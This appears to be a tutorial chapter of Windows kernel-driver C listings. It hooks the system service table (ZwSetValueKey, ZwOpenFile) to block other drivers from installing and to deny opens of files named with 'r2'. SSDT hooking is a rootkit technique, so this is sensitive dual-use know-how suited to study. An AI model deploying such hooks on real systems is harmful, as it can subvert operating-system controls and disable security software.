Stop a Device Driver from being Loaded

 

We have had enough of processes, threads, files and hiding them. This chapter is different: it starts by showing how our own device driver can stop another device driver from being loaded. The first listing does this by hooking ZwSetValueKey in the system service table and refusing any write of the `Type` value under the `...\Services` registry key — the write that a driver's service entry needs before it can be started. The later listings add a grace period after load and apply the same hooking trick to ZwOpenFile. Here goes.

 

#include <ntddk.h>

#include <stdio.h>

/* ZwSetValueKey is declared by hand here; DriverEntry reads the service
   number out of this exported stub instead of hard-coding it. */
NTSYSAPI NTSTATUS NTAPI ZwSetValueKey(HANDLE KeyHandle,PUNICODE_STRING ValueName,ULONG TitleIndex,ULONG Type,PVOID Data,ULONG DataSize);

/* Layout of the kernel's service descriptor table as this listing expects
   it on 32-bit x86 (one 4-byte handler address per slot).  It has to match
   the kernel's own definition byte for byte, so it is documented rather than
   restyled. */
typedef struct

{

unsigned int *ServiceTableBase;        /* ServiceTableBase[n] = handler for service n */

unsigned int *ServiceCounterTableBase; /* not used by this driver */

unsigned int NumberOfServices;         /* number of valid slots; the bound for any index */

unsigned char *ParamTableBase;         /* not used by this driver */

} sdt;

/* The kernel's exported table; written directly by DriverEntry and
   DriverUnload to install and remove the hook. */
__declspec(dllimport) sdt KeServiceDescriptorTable;

/* Signature shared by ZwSetValueKey, the hook and the saved original. */
typedef NTSTATUS (NTAPI *qtype)(HANDLE,PUNICODE_STRING,ULONG,ULONG,PVOID,ULONG);

/* Original SSDT entry saved by DriverEntry; the hook forwards to it and
   DriverUnload writes it back.  Zero until DriverEntry has run. */
qtype OldZwSetValueKey;

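/*
 * Replacement for ZwSetValueKey, installed in the SSDT by DriverEntry.
 *
 * Every NtSetValueKey call on the system lands here with the caller's
 * arguments.  If the target key lives under
 * \Registry\Machine\System\ControlSet001\Services and the value being
 * written is "Type", the write is refused with STATUS_ACCESS_DENIED;
 * everything else is forwarded unchanged to the original handler.
 *
 * Fixes over the first version of this listing:
 *  - the return values of ObReferenceObjectByHandle/ObQueryNameString are
 *    checked; on failure the call is simply forwarded instead of
 *    dereferencing an uninitialised object pointer;
 *  - the handle is validated in the caller's previous mode, so a user-mode
 *    caller cannot hand this hook a kernel handle value;
 *  - the key name is read through the UNICODE_STRING that ObQueryNameString
 *    returns instead of assuming it starts 4 WCHARs into the buffer;
 *  - UNICODE_STRINGs are not NUL-terminated, so "Type" is matched by
 *    Length rather than with a terminated-string compare;
 *  - ValueName may be NULL; it is checked before use.
 *
 * Still open (left for a later revision):
 *  - The path is compared against ControlSet001 only.  CurrentControlSet is a
 *    link to ControlSetNNN and the name reported by ObQueryNameString is the
 *    resolved one, so on a machine whose active set is not 001 nothing is
 *    ever blocked.
 *  - ValueName comes straight from the caller.  A user-mode caller can pass a
 *    bad pointer and fault the kernel here before the real ZwSetValueKey
 *    gets to validate it; ProbeForRead under __try is the proper fix.
 */
NTSTATUS NewZwSetValueKey(HANDLE KeyHandle,PUNICODE_STRING ValueName,ULONG TitleIndex,ULONG Type,PVOID Data,ULONG DataSize)
{
    static const WCHAR services_prefix[] = L"\\Registry\\Machine\\System\\ControlSet001\\Services";
    const ULONG prefix_chars = sizeof(services_prefix) / sizeof(services_prefix[0]) - 1;
    /* ObQueryNameString fills an OBJECT_NAME_INFORMATION: a UNICODE_STRING
       followed by the characters it points at.  2 KB of kernel stack. */
    WCHAR buf[1024];
    PUNICODE_STRING name = (PUNICODE_STRING)buf;
    PVOID Object = NULL;
    ULONG bytes = 0;
    NTSTATUS status;

    status = ObReferenceObjectByHandle(KeyHandle, 0, NULL, ExGetPreviousMode(), &Object, NULL);
    if (!NT_SUCCESS(status))
        return OldZwSetValueKey(KeyHandle,ValueName,TitleIndex,Type,Data,DataSize);

    status = ObQueryNameString(Object, (POBJECT_NAME_INFORMATION)buf, sizeof(buf), &bytes);
    ObDereferenceObject(Object);

    if (NT_SUCCESS(status) && name->Buffer != NULL &&
        name->Length / sizeof(WCHAR) >= prefix_chars &&
        _wcsnicmp(services_prefix, name->Buffer, prefix_chars) == 0)
    {
        DbgPrint("%wZ", name);
        if (ValueName != NULL && ValueName->Buffer != NULL)
        {
            DbgPrint("ValueName=%wZ bytes=%lu", ValueName, bytes);
            /* "Type" is exactly 4 WCHARs; compare by length, not terminator. */
            if (ValueName->Length == 4 * sizeof(WCHAR) &&
                _wcsnicmp(L"Type", ValueName->Buffer, 4) == 0)
                return STATUS_ACCESS_DENIED;
        }
    }

    return OldZwSetValueKey(KeyHandle,ValueName,TitleIndex,Type,Data,DataSize);
}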

/* SSDT index of ZwSetValueKey; computed by DriverEntry, reused by
   DriverUnload to restore the original entry. */
long no;

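/*
 * IRP_MJ_CREATE handler: accept every open of the driver's device.
 *
 * The status and byte count are stored in the IRP before it is completed;
 * the earlier version completed the IRP without setting Irp->IoStatus, so
 * the I/O manager returned whatever was left in those fields.  Note that
 * DriverEntry in this listing never creates a device object, so this
 * routine is only reached if one is added later.
 */
NTSTATUS DriverDispatcher(PDEVICE_OBJECT pDeviceObject, PIRP Irp)
{
    DbgPrint("IRP_MJ_CREATE\n");
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;      /* no data transferred */
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}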

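/*
 * Unload routine: put the saved ZwSetValueKey entry back into the SSDT so
 * that no system call keeps pointing into this (soon unmapped) image.
 *
 * The entry is only restored when DriverEntry actually saved one; writing a
 * zero into the table would crash the next caller of ZwSetValueKey.
 * cli/sti only mask interrupts on the current CPU.  The 4-byte store is
 * atomic on x86 anyway, but nothing here waits for a thread that is already
 * executing inside NewZwSetValueKey on another CPU, so unloading while the
 * hook is busy remains a race.
 */
VOID DriverUnload(PDRIVER_OBJECT DriverObject)
{
    DbgPrint("Driver Unloading");
    if (OldZwSetValueKey != NULL)
    {
        _asm cli
        KeServiceDescriptorTable.ServiceTableBase[no] = (unsigned int)OldZwSetValueKey;
        _asm sti
        OldZwSetValueKey = NULL;
    }
}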

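/*
 * Locate ZwSetValueKey's system-service number and hook it.
 *
 * On 32-bit x86 the Zw* stubs exported by ntoskrnl begin with
 * `mov eax, <service number>` (opcode B8, 32-bit immediate at offset 1);
 * the number is read from there so the code is not tied to one kernel
 * build.  Before the table is touched the opcode is verified and the index
 * is bounded by NumberOfServices; if either check fails the load is refused
 * instead of patching a random slot.  DriverUnload is not called when
 * DriverEntry fails, and nothing has been changed at that point.
 *
 * Not handled here: on kernels where the SSDT page is write-protected the
 * store below faults; this listing assumes it is writable.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT driverObject, PUNICODE_STRING RegistryPath)
{
    const unsigned char *stub = (const unsigned char *)ZwSetValueKey;

    driverObject->DriverUnload = DriverUnload;
    driverObject->MajorFunction[IRP_MJ_CREATE] = DriverDispatcher;
    DbgPrint("Vijay Driver");

    if (stub[0] != 0xB8)
    {
        DbgPrint("ZwSetValueKey stub does not start with mov eax,imm32 - not hooking");
        return STATUS_UNSUCCESSFUL;
    }
    no = *(const long *)(stub + 1);
    if (no < 0 || (unsigned int)no >= KeServiceDescriptorTable.NumberOfServices)
    {
        DbgPrint("service number %ld out of range - not hooking", no);
        return STATUS_UNSUCCESSFUL;
    }

    OldZwSetValueKey = (qtype)KeServiceDescriptorTable.ServiceTableBase[no];
    _asm cli
    KeServiceDescriptorTable.ServiceTableBase[no] = (unsigned int)NewZwSetValueKey;
    _asm sti
    return STATUS_SUCCESS;
}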

 

 

#include <ntddk.h>

#include <stdio.h>

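/*
 * IRP_MJ_CREATE handler: accept every open of the driver's device.
 *
 * Sets Irp->IoStatus before completing; the earlier version completed the
 * IRP with whatever status was already in it.  DriverEntry in this listing
 * creates no device object, so this is only reached if one is added.
 */
NTSTATUS DriverDispatcher(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
{
    pIrp->IoStatus.Status = STATUS_SUCCESS;
    pIrp->IoStatus.Information = 0;     /* no data transferred */
    IoCompleteRequest(pIrp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}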

/* Timer and DPC objects, allocated from NonPagedPool in DriverEntry and
   released in DriverUnload.  NULL until DriverEntry has run. */
PKTIMER         gTimer;

PKDPC gDPCP;

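/*
 * Unload routine: stop the periodic timer and release the timer and DPC
 * objects.
 *
 * KeCancelTimer only prevents future expirations; a DPC that the timer has
 * already queued can still be running on another CPU, so KeFlushQueuedDpcs
 * waits for it before the KDPC memory is freed.  Both pointers are checked
 * because ExFreePool(NULL) is not a no-op, and they are cleared afterwards.
 */
VOID DriverUnload(PDRIVER_OBJECT DriverObject)
{
    DbgPrint("Unloading");
    if (gTimer != NULL)
    {
        KeCancelTimer(gTimer);
        KeFlushQueuedDpcs();    /* let an in-flight abc() finish */
        ExFreePool(gTimer);
        gTimer = NULL;
    }
    if (gDPCP != NULL)
    {
        ExFreePool(gDPCP);
        gDPCP = NULL;
    }
}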

/* l1: system time (100 ns units) recorded in DriverEntry;
   l2, diff: scratch written by the DPC routine abc on each expiration. */
__int64 l1,l2,diff;

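/*
 * DPC routine run by the periodic timer armed in DriverEntry.
 * Reads the current system time and prints the raw and whole-second
 * elapsed time since DriverEntry recorded l1.
 *
 * Runs at DISPATCH_LEVEL; only DbgPrint and KeQuerySystemTime are used.
 * The second DbgPrint now uses %I64d: diff is a 64-bit value and printing
 * it with %d is a format/argument mismatch.
 */
VOID abc(PKDPC Dpc,PVOID DeferredContext,PVOID sys1,PVOID sys2)
{
    enum { TICKS_PER_SECOND = 10000000 };   /* KeQuerySystemTime: 100 ns units */

    KeQuerySystemTime((PLARGE_INTEGER)&l2);
    diff = l2 - l1;
    DbgPrint("l1=%I64d l2=%I64d diff=%I64d", l1, l2, diff);
    diff = diff / TICKS_PER_SECOND;
    DbgPrint("Diff1=%I64d", diff);
}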

/* DueTime handed to KeSetTimerEx.  File-scope, so zero-initialised: the
   listing never sets it, which makes the first expiration immediate. */
LARGE_INTEGER timeout;

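/*
 * Allocate a timer and DPC and arm the timer to call abc immediately
 * (timeout is zero) and then every 5000 ms.
 *
 * Changes from the first version of this listing:
 *  - both ExAllocatePool results are checked; on failure whatever was
 *    allocated is freed here, because DriverUnload is not called when
 *    DriverEntry fails;
 *  - l1 is recorded BEFORE the timer is armed.  With an immediate due time
 *    the first DPC can run at once on another CPU and would otherwise read
 *    l1 == 0.
 * ExAllocatePool without a tag is kept as the listing had it; a tagged
 * allocation would make pool leaks easier to attribute.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT driverObject, PUNICODE_STRING RegistryPath)
{
    driverObject->MajorFunction[IRP_MJ_CREATE] = DriverDispatcher;
    driverObject->DriverUnload = DriverUnload;
    DbgPrint("Vijay 2");

    gTimer = ExAllocatePool(NonPagedPool, sizeof(KTIMER));
    gDPCP = ExAllocatePool(NonPagedPool, sizeof(KDPC));
    if (gTimer == NULL || gDPCP == NULL)
    {
        if (gTimer != NULL)
        {
            ExFreePool(gTimer);
            gTimer = NULL;
        }
        if (gDPCP != NULL)
        {
            ExFreePool(gDPCP);
            gDPCP = NULL;
        }
        return STATUS_INSUFFICIENT_RESOURCES;
    }

    KeQuerySystemTime((PLARGE_INTEGER)&l1);   /* reference point for abc */

    KeInitializeTimer(gTimer);
    KeInitializeDpc(gDPCP, abc, NULL);
    KeSetTimerEx(gTimer, timeout, 5000, gDPCP);

    return STATUS_SUCCESS;
}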

#include <ntddk.h>

#include <stdio.h>

/* ZwSetValueKey is declared by hand here; DriverEntry reads the service
   number out of this exported stub instead of hard-coding it. */
NTSYSAPI NTSTATUS NTAPI ZwSetValueKey(HANDLE KeyHandle,PUNICODE_STRING ValueName,ULONG TitleIndex,ULONG Type,PVOID Data,ULONG DataSize);

/* Layout of the kernel's service descriptor table as this listing expects
   it on 32-bit x86 (one 4-byte handler address per slot).  It has to match
   the kernel's own definition byte for byte, so it is documented rather than
   restyled. */
typedef struct

{

unsigned int *ServiceTableBase;        /* ServiceTableBase[n] = handler for service n */

unsigned int *ServiceCounterTableBase; /* not used by this driver */

unsigned int NumberOfServices;         /* number of valid slots; the bound for any index */

unsigned char *ParamTableBase;         /* not used by this driver */

} sdt;

/* The kernel's exported table; written directly by DriverEntry and
   DriverUnload to install and remove the hook. */
__declspec(dllimport) sdt KeServiceDescriptorTable;

/* Signature shared by ZwSetValueKey, the hook and the saved original. */
typedef NTSTATUS (NTAPI *qtype)(HANDLE,PUNICODE_STRING,ULONG,ULONG,PVOID,ULONG);

/* Original SSDT entry saved by DriverEntry; the hook forwards to it and
   DriverUnload writes it back.  Zero until DriverEntry has run. */
qtype OldZwSetValueKey;

/* l1: system time (100 ns units) recorded at the top of DriverEntry; the
   hook uses it to allow registry writes during a grace period after load.
   l2, diff: scratch used by the hook. */
__int64 l1,l2,diff;

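/*
 * Replacement for ZwSetValueKey, installed in the SSDT by DriverEntry.
 *
 * Like the first listing, refuses writes of the "Type" value under
 * \Registry\Machine\System\ControlSet001\Services with STATUS_ACCESS_DENIED,
 * but only once GRACE_SECONDS have passed since DriverEntry recorded l1;
 * earlier writes (e.g. this driver's own installation) are let through.
 * Everything else is forwarded unchanged to the original handler.
 *
 * Fixes over the earlier version:
 *  - ObReferenceObjectByHandle/ObQueryNameString results are checked; on
 *    failure the call is forwarded instead of using an uninitialised object;
 *  - the handle is validated in the caller's previous mode, so user mode
 *    cannot hand this hook a kernel handle value;
 *  - the key name is read through the UNICODE_STRING ObQueryNameString
 *    returns instead of assuming a 4-WCHAR offset into the buffer;
 *  - UNICODE_STRINGs are not NUL-terminated, so "Type" is matched by Length;
 *  - ValueName may be NULL and is checked;
 *  - the elapsed time is kept in locals.  The file-scope l2/diff were being
 *    written by every concurrent caller, so two threads could compute each
 *    other's values.  l1 is only read.
 *
 * Still open: the path is compared against ControlSet001 only (the active
 * set may be another ControlSetNNN), and ValueName is used without
 * ProbeForRead/__try, so a user-mode caller can fault the kernel here.
 */
NTSTATUS NewZwSetValueKey(HANDLE KeyHandle,PUNICODE_STRING ValueName,ULONG TitleIndex,ULONG Type,PVOID Data,ULONG DataSize)
{
    enum { GRACE_SECONDS = 25, TICKS_PER_SECOND = 10000000 };   /* KeQuerySystemTime: 100 ns units */
    static const WCHAR services_prefix[] = L"\\Registry\\Machine\\System\\ControlSet001\\Services";
    const ULONG prefix_chars = sizeof(services_prefix) / sizeof(services_prefix[0]) - 1;
    /* ObQueryNameString fills an OBJECT_NAME_INFORMATION: a UNICODE_STRING
       followed by the characters it points at.  2 KB of kernel stack. */
    WCHAR buf[1024];
    PUNICODE_STRING name = (PUNICODE_STRING)buf;
    PVOID Object = NULL;
    ULONG bytes = 0;
    NTSTATUS status;
    __int64 now, elapsed_seconds;

    status = ObReferenceObjectByHandle(KeyHandle, 0, NULL, ExGetPreviousMode(), &Object, NULL);
    if (!NT_SUCCESS(status))
        return OldZwSetValueKey(KeyHandle,ValueName,TitleIndex,Type,Data,DataSize);

    status = ObQueryNameString(Object, (POBJECT_NAME_INFORMATION)buf, sizeof(buf), &bytes);
    ObDereferenceObject(Object);

    if (NT_SUCCESS(status) && name->Buffer != NULL &&
        name->Length / sizeof(WCHAR) >= prefix_chars &&
        _wcsnicmp(services_prefix, name->Buffer, prefix_chars) == 0)
    {
        DbgPrint("%wZ", name);
        if (ValueName != NULL && ValueName->Buffer != NULL)
        {
            DbgPrint("ValueName=%wZ bytes=%lu", ValueName, bytes);

            KeQuerySystemTime((PLARGE_INTEGER)&now);
            elapsed_seconds = (now - l1) / TICKS_PER_SECOND;

            /* "Type" is exactly 4 WCHARs; compare by length, not terminator. */
            if (ValueName->Length == 4 * sizeof(WCHAR) &&
                _wcsnicmp(L"Type", ValueName->Buffer, 4) == 0 &&
                elapsed_seconds >= GRACE_SECONDS)
                return STATUS_ACCESS_DENIED;
        }
    }

    return OldZwSetValueKey(KeyHandle,ValueName,TitleIndex,Type,Data,DataSize);
}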

/* SSDT index of ZwSetValueKey; computed by DriverEntry, reused by
   DriverUnload to restore the original entry. */
long no;

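/*
 * IRP_MJ_CREATE handler: accept every open of the driver's device.
 *
 * Sets Irp->IoStatus before completing; the earlier version completed the
 * IRP with whatever status was already in it.  DriverEntry in this listing
 * creates no device object, so this is only reached if one is added.
 */
NTSTATUS DriverDispatcher(PDEVICE_OBJECT pDeviceObject, PIRP Irp)
{
    DbgPrint("IRP_MJ_CREATE\n");
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;      /* no data transferred */
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}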

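/*
 * Unload routine: put the saved ZwSetValueKey entry back into the SSDT so
 * that no system call keeps pointing into this (soon unmapped) image.
 *
 * Restores only when DriverEntry actually saved an entry; writing a zero
 * into the table would crash the next caller.  cli/sti mask interrupts on
 * the current CPU only; the 4-byte store is atomic on x86, but a thread
 * already executing inside NewZwSetValueKey on another CPU is not waited
 * for, so unloading while the hook is busy remains a race.
 */
VOID DriverUnload(PDRIVER_OBJECT DriverObject)
{
    DbgPrint("Driver Unloading");
    if (OldZwSetValueKey != NULL)
    {
        _asm cli
        KeServiceDescriptorTable.ServiceTableBase[no] = (unsigned int)OldZwSetValueKey;
        _asm sti
        OldZwSetValueKey = NULL;
    }
}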

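/*
 * Record the load time in l1, then locate ZwSetValueKey's system-service
 * number and hook it.
 *
 * On 32-bit x86 the Zw* stubs exported by ntoskrnl begin with
 * `mov eax, <service number>` (opcode B8, 32-bit immediate at offset 1).
 * The opcode is verified and the index bounded by NumberOfServices before
 * the table is written; if either check fails the load is refused instead
 * of patching a random slot.  Nothing has been changed at that point and
 * DriverUnload is not called for a failed DriverEntry.
 *
 * Not handled here: on kernels where the SSDT page is write-protected the
 * store below faults; this listing assumes it is writable.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT driverObject, PUNICODE_STRING RegistryPath)
{
    const unsigned char *stub = (const unsigned char *)ZwSetValueKey;

    KeQuerySystemTime((PLARGE_INTEGER)&l1);   /* start of the hook's grace period */

    driverObject->DriverUnload = DriverUnload;
    driverObject->MajorFunction[IRP_MJ_CREATE] = DriverDispatcher;
    DbgPrint("Vijay Driver");

    if (stub[0] != 0xB8)
    {
        DbgPrint("ZwSetValueKey stub does not start with mov eax,imm32 - not hooking");
        return STATUS_UNSUCCESSFUL;
    }
    no = *(const long *)(stub + 1);
    if (no < 0 || (unsigned int)no >= KeServiceDescriptorTable.NumberOfServices)
    {
        DbgPrint("service number %ld out of range - not hooking", no);
        return STATUS_UNSUCCESSFUL;
    }

    OldZwSetValueKey = (qtype)KeServiceDescriptorTable.ServiceTableBase[no];
    _asm cli
    KeServiceDescriptorTable.ServiceTableBase[no] = (unsigned int)NewZwSetValueKey;
    _asm sti
    return STATUS_SUCCESS;
}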

 

 

#include <ntddk.h>

#include <stdio.h>

/* ZwOpenFile is declared by hand here; DriverEntry reads the service
   number out of this exported stub instead of hard-coding it. */
NTSYSAPI NTSTATUS NTAPI ZwOpenFile(PHANDLE phFile,ACCESS_MASK DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes,PIO_STATUS_BLOCK pIoStatusBlock,ULONG ShareMode,ULONG OpenMode);

/* Layout of the kernel's service descriptor table as this listing expects
   it on 32-bit x86 (one 4-byte handler address per slot).  It has to match
   the kernel's own definition byte for byte, so it is documented rather than
   restyled. */
typedef struct

{

unsigned int *ServiceTableBase;        /* ServiceTableBase[n] = handler for service n */

unsigned int *ServiceCounterTableBase; /* not used by this driver */

unsigned int NumberOfServices;         /* number of valid slots; the bound for any index */

unsigned char *ParamTableBase;         /* not used by this driver */

} sdt;

/* The kernel's exported table; written directly by DriverEntry and
   DriverUnload to install and remove the hook. */
__declspec(dllimport) sdt KeServiceDescriptorTable;

/* Signature shared by ZwOpenFile, the hook and the saved original. */
typedef NTSTATUS (NTAPI *qtype)(PHANDLE,ACCESS_MASK,POBJECT_ATTRIBUTES,PIO_STATUS_BLOCK,ULONG,ULONG);

/* Original SSDT entry saved by DriverEntry; the hook forwards to it and
   DriverUnload writes it back.  Zero until DriverEntry has run. */
qtype OldZwOpenFile;

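/*
 * Bounded, case-sensitive search for needle inside a counted UNICODE_STRING.
 * Returns 1 if found, 0 otherwise.  Uses Length rather than a terminator
 * because UNICODE_STRING buffers need not be NUL-terminated.
 */
static int unicode_contains(const UNICODE_STRING *s, const WCHAR *needle)
{
    ULONG len = s->Length / sizeof(WCHAR);
    ULONG nlen = (ULONG)wcslen(needle);
    ULONG i;

    if (s->Buffer == NULL || nlen == 0 || len < nlen)
        return 0;
    for (i = 0; i + nlen <= len; i++)
        if (wcsncmp(s->Buffer + i, needle, nlen) == 0)
            return 1;
    return 0;
}

/*
 * Replacement for ZwOpenFile, installed in the SSDT by DriverEntry.
 *
 * Refuses any open whose object name contains "r2" with STATUS_ACCESS_DENIED
 * and forwards everything else to the original handler.
 *
 * Fixes over the earlier version:
 *  - ObjectAttributes->ObjectName may legitimately be NULL (opens relative
 *    to RootDirectory); it is checked before being dereferenced;
 *  - the search is bounded by ObjectName->Length instead of wcsstr on a
 *    buffer that is not guaranteed to be NUL-terminated, and the name is
 *    printed with %wZ for the same reason;
 *  - the wcsstr result was stored in an int; the match is now a plain flag.
 *
 * Still open: ObjectAttributes is used exactly as the caller supplied it.
 * For a user-mode caller that means an unprobed user pointer is read at
 * DISPATCH_LEVEL-free but still privileged context; a bad pointer faults the
 * kernel before the real ZwOpenFile can reject it.  ProbeForRead under
 * __try (when ExGetPreviousMode() is UserMode) is the proper fix.
 */
NTSTATUS NewZwOpenFile(PHANDLE phFile,ACCESS_MASK DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes,PIO_STATUS_BLOCK pIoStatusBlock,ULONG ShareMode,ULONG OpenMode)
{
    DbgPrint("ZwOpenFile");

    if (ObjectAttributes != NULL && ObjectAttributes->ObjectName != NULL)
    {
        int hit = unicode_contains(ObjectAttributes->ObjectName, L"r2");

        DbgPrint("Name=%wZ hit=%d", ObjectAttributes->ObjectName, hit);
        if (hit)
            return STATUS_ACCESS_DENIED;
    }

    return OldZwOpenFile(phFile,DesiredAccess,ObjectAttributes,pIoStatusBlock,ShareMode,OpenMode);
}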

/* SSDT index of ZwOpenFile; computed by DriverEntry, reused by
   DriverUnload to restore the original entry. */
long no;

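/*
 * IRP_MJ_CREATE handler: accept every open of the driver's device.
 *
 * Sets Irp->IoStatus before completing; the earlier version completed the
 * IRP with whatever status was already in it.  DriverEntry in this listing
 * creates no device object, so this is only reached if one is added.
 */
NTSTATUS DriverDispatcher(PDEVICE_OBJECT pDeviceObject, PIRP Irp)
{
    DbgPrint("IRP_MJ_CREATE\n");
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;      /* no data transferred */
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}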

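/*
 * Unload routine: put the saved ZwOpenFile entry back into the SSDT so that
 * no system call keeps pointing into this (soon unmapped) image.
 *
 * Restores only when DriverEntry actually saved an entry; writing a zero
 * into the table would crash the next caller.  cli/sti mask interrupts on
 * the current CPU only; the 4-byte store is atomic on x86, but a thread
 * already executing inside NewZwOpenFile on another CPU is not waited for,
 * so unloading while the hook is busy remains a race.
 */
VOID DriverUnload(PDRIVER_OBJECT DriverObject)
{
    DbgPrint("Driver Unloading");
    if (OldZwOpenFile != NULL)
    {
        _asm cli
        KeServiceDescriptorTable.ServiceTableBase[no] = (unsigned int)OldZwOpenFile;
        _asm sti
        OldZwOpenFile = NULL;
    }
}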

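/*
 * Locate ZwOpenFile's system-service number and hook it.
 *
 * On 32-bit x86 the Zw* stubs exported by ntoskrnl begin with
 * `mov eax, <service number>` (opcode B8, 32-bit immediate at offset 1).
 * The opcode is verified and the index bounded by NumberOfServices before
 * the table is written; if either check fails the load is refused instead
 * of patching a random slot.  Nothing has been changed at that point and
 * DriverUnload is not called for a failed DriverEntry.
 *
 * Not handled here: on kernels where the SSDT page is write-protected the
 * store below faults; this listing assumes it is writable.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT driverObject, PUNICODE_STRING RegistryPath)
{
    const unsigned char *stub = (const unsigned char *)ZwOpenFile;

    driverObject->DriverUnload = DriverUnload;
    driverObject->MajorFunction[IRP_MJ_CREATE] = DriverDispatcher;
    DbgPrint("Vijay Driver");

    if (stub[0] != 0xB8)
    {
        DbgPrint("ZwOpenFile stub does not start with mov eax,imm32 - not hooking");
        return STATUS_UNSUCCESSFUL;
    }
    no = *(const long *)(stub + 1);
    if (no < 0 || (unsigned int)no >= KeServiceDescriptorTable.NumberOfServices)
    {
        DbgPrint("service number %ld out of range - not hooking", no);
        return STATUS_UNSUCCESSFUL;
    }

    OldZwOpenFile = (qtype)KeServiceDescriptorTable.ServiceTableBase[no];
    _asm cli
    KeServiceDescriptorTable.ServiceTableBase[no] = (unsigned int)NewZwOpenFile;
    _asm sti
    return STATUS_SUCCESS;
}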

 
